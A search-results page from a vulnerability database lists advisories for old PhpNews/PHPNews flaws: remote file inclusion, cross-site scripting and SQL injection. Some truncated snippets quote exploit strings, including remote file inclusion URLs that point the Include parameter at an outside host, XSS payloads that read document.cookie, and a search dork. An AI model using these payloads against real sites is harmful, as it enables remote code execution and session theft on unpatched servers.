Lucene search
K

66 matches found

Cvelist
Cvelist
added 2007/02/27 6:0 p.m.21 views

CVE-2006-7081

Multiple PHP remote file inclusion vulnerabilities in PhpNews 1.0 allow remote attackers to execute arbitrary PHP code via the Include parameter to 1 Include/lib.inc.php3 and 2 Include/variables.php3...

7.8AI score0.0263EPSS
Exploits1References5
CVE
CVE
added 2007/02/27 6:0 p.m.45 views

CVE-2006-7081

This CVE details remote PHP file inclusion in PhpNews 1.0, exploitable via the Include parameter to Include/lib.inc.php3 and Include/variables.php3. The underlying issue is likely insecure handling of user-controlled Include paths, enabling arbitrary PHP code execution on affected servers. The pr...

7.5CVSS8.1AI score0.0263EPSS
Exploits1References5Affected Software1
seebug.org
seebug.org
added 2006/12/14 12:0 a.m.57 views

PhpNews远程文件包含漏洞

PhpNews是一款基于PHP的新闻管理程序。 PhpNews不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于多个脚本对用户提交的'Include'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 PHPNews PHPNews 1.0 目前没有解决方案提供,请关注以下链接: http://newsphp.sourceforge.net/index.php http://www.example.com/Path/Include/lib.inc.php3?Include=http://cmd.gif?...

7.1AI score
Exploits0
NVD
NVD
added 2006/12/07 1:28 a.m.14 views

CVE-2006-6356

Multiple cross-site scripting XSS vulnerabilities in templates/linktemp.php in PHPNews 1.3.0 allow remote attackers to inject arbitrary web script or HTML via the 1 url, 2 id, 3 subject, 4 username, or 5 time parameter...

6.8CVSS5.8AI score0.01969EPSS
Exploits0References6
NVD
NVD
added 2006/12/07 1:28 a.m.11 views

CVE-2006-6357

Cross-site scripting XSS vulnerability in templates/cattemp.php in PHPNews 1.3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information...

6.8CVSS5.6AI score0.011EPSS
Exploits0References1
Cvelist
Cvelist
added 2006/12/07 1:0 a.m.21 views

CVE-2006-6356

Multiple cross-site scripting XSS vulnerabilities in templates/linktemp.php in PHPNews 1.3.0 allow remote attackers to inject arbitrary web script or HTML via the 1 url, 2 id, 3 subject, 4 username, or 5 time parameter...

5.8AI score0.01969EPSS
Exploits0References6
Cvelist
Cvelist
added 2006/12/07 1:0 a.m.19 views

CVE-2006-6357

Cross-site scripting XSS vulnerability in templates/cattemp.php in PHPNews 1.3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information...

5.6AI score0.011EPSS
Exploits0References1
CVE
CVE
added 2006/12/07 1:0 a.m.42 views

CVE-2006-6357

PHPNews 1.3.0 and earlier contains a cross-site scripting (XSS) vulnerability in templates/cat_temp.php. The issue allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. The public details specify the affected product and file but do not provide exploit steps, aff...

6.8CVSS5.8AI score0.011EPSS
Exploits0References1Affected Software1
CVE
CVE
added 2006/12/07 1:0 a.m.43 views

CVE-2006-6356

The CVE-2006-6356 entry covers multiple XSS vulnerabilities in PHPNews 1.3.0, specifically in templates/link_temp.php. The issue allows remote attackers to inject arbitrary web script or HTML by supplying one of several parameters (url, id, subject, username, time). The root cause is input handli...

6.8CVSS6AI score0.01969EPSS
Exploits0References6Affected Software1
Packet Storm
Packet Storm
added 2006/12/06 12:0 a.m.37 views

phpnews130-xss.txt

PHP Script: PHPNews 1.3.0 Class: XSS Website: http://newsphp.sourceforge.net Found by: Detefix dork: inurl:phpnews ----- - Vulnerable Code: $subject by $username on $time ----- - Exploits: http://target/path-to-PHPNews/templates/linktemp.php?url="XSS...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2006/12/05 12:0 a.m.41 views

PHPNews 1.3.0 XSS

PHP Script: PHPNews 1.3.0 Class: XSS Website: http://newsphp.sourceforge.net Found by: Detefix dork: inurl:phpnews ----- - Vulnerable Code: ?php printEOT a href="$url?action=fullnewsshowcomments=1id=$id"$subject/a by $username on $timebr / ----- - Exploits:...

7.2AI score
Exploits0
exploitpack
exploitpack
added 2006/12/02 12:0 a.m.18 views

PHPNews 1.3 - Link_Temp.php Cross-Site Scripting

PHPNews 1.3 - LinkTemp.php Cross-Site Scripting source: https://www.securityfocus.com/bid/21404/info PHPNews is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code...

6.8AI score
Exploits0
Exploit DB
Exploit DB
added 2006/12/02 12:0 a.m.56 views

PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/21404/info PHPNews is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in t...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2006/09/07 12:0 a.m.13 views

PhpNews 1.0 - Include Remote File Inclusion

PhpNews 1.0 - Include Remote File Inclusion PhpNews v1.0 Remote File Inclusion Vulnerability Download: ftp://ftp1.comscripts.com/PHP/36phpnews-10.zip Found By: the master exploit: http://Target/Path/Include/lib.inc.php3?Include=http://cmd.gif?...

0.3AI score
Exploits0
seebug.org
seebug.org
added 2006/09/07 12:0 a.m.14 views

PhpNews 1.0 (Include) Remote File Include Vulnerabilities

No description provided by source. PhpNews v1.0 Remote File Inclusion Vulnerability Download: ftp://ftp1.comscripts.com/PHP/36phpnews-10.zip Found By: the master exploit: http://Target/Path/Include/lib.inc.php3?Include=http://cmd.gif?...

7.1AI score
Exploits0
0day.today
0day.today
added 2006/09/07 12:0 a.m.22 views

PhpNews 1.0 (Include) Remote File Include Vulnerabilities

Exploit for unknown platform in category web applications ========================================================= PhpNews 1.0 Include Remote File Include Vulnerabilities ========================================================= PhpNews v1.0 Remote File Inclusion Vulnerability Download:...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/09/07 12:0 a.m.32 views

PhpNews 1.0 - 'Include' Remote File Inclusion

PhpNews v1.0 Remote File Inclusion Vulnerability Download: ftp://ftp1.comscripts.com/PHP/36phpnews-10.zip Found By: the master exploit: http://Target/Path/Include/lib.inc.php3?Include=http://cmd.gif? http://Target/Path/Include/variables.php3?Include=http://cmd.gif? milw0rm.com 2006-09-07...

7.4AI score
Exploits0
Packet Storm
Packet Storm
added 2005/08/31 12:0 a.m.32 views

multiVulns.txt

Multi-CMS/Forum Vulnability's Found by ap0c hackers pacifico & ratboy Yo! Ok, well a couple new vulnabilitys have been found by.. us : ------------------ First; e107 xss--- ------------------ link=http://w000000w00tw00t/asdadLIlink= onMouseOver='alertdocument.cookie;'...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2005/08/29 12:0 a.m.52 views

Multiple CMS/Forum Vulnablilties

Multi-CMS/Forum Vulnability's Found by ap0c hackers pacifico & ratboy Yo! Ok, well a couple new vulnabilitys have been found by.. us : ------------------ First; e107 xss--- ------------------ link=http://w000000w00tw00t/asdadLIlink= onMouseOver='alertdocument.cookie;' h1d3="size=24HIGHLIGHT...

9.1AI score
Exploits0
CVE
CVE
added 2005/08/20 4:0 a.m.48 views

CVE-2004-2474

CVE-2004-2474 affects PHPNews 1.2.3. The vulnerability is a SQL injection via the mid parameter in sendtofriend.php, allowing a remote attacker to execute arbitrary SQL commands. The provided documents do not specify a fixed version or concrete remediation; one NASL entry suggests upgrading PHP, ...

7.5CVSS8.4AI score0.01211EPSS
Exploits0References5Affected Software1
Rows per page
Query Builder